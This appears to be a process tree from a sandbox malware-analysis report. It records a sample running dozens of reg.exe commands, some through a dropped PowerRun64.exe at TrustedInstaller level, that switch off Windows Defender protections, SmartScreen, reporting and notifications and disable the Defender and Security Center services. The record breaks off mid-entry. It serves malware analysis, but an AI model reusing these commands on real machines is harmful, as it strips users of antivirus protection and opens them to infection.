C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
5⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
5⤵
PID:112

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
5⤵
PID:3408

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
5⤵
PID:924

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
5⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
5⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
5⤵
PID:2528

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
5⤵
PID:3320

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
5⤵
PID:3332

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
5⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
5⤵
PID:3416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
5⤵
PID:4172

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
5⤵
PID:2452

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
5⤵
PID:2588

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
5⤵
PID:2788

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
5⤵
PID:4836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
5⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
5⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
5⤵
PID:3076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
5⤵
PID:452

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
5⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
5⤵
PID:2620

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
5⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
5⤵
PID:3644

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
5⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
5⤵
PID:4576

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
5⤵
PID:392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
5⤵
PID:4020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
5⤵
PID:3388

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
5⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
5⤵
PID:4504

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
5⤵
PID:3792

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
5⤵
PID:1232

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
5⤵
PID:4040

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
5⤵
PID:2696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:3628

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
5⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
5⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
5⤵
PID:2704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
5⤵
PID:4204

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
5⤵
PID:856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
5⤵
PID:3536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
5⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
5⤵
PID:2328

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
5⤵
PID:5100

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
5⤵
PID:4400

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
5⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3600

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4272

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4436

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:380

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:2588

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2620

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:3388

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:1168

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:4120

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4276

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1660

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:1644

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:1116

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:684

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:3504

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:1584

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:3792

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:112

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4276

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:3352

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4500

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2608

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:1700

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:924

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:3848

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2132

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2964

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2812

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:1052

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2912

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4208

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4328

C:\Windows\System32\reg.exe
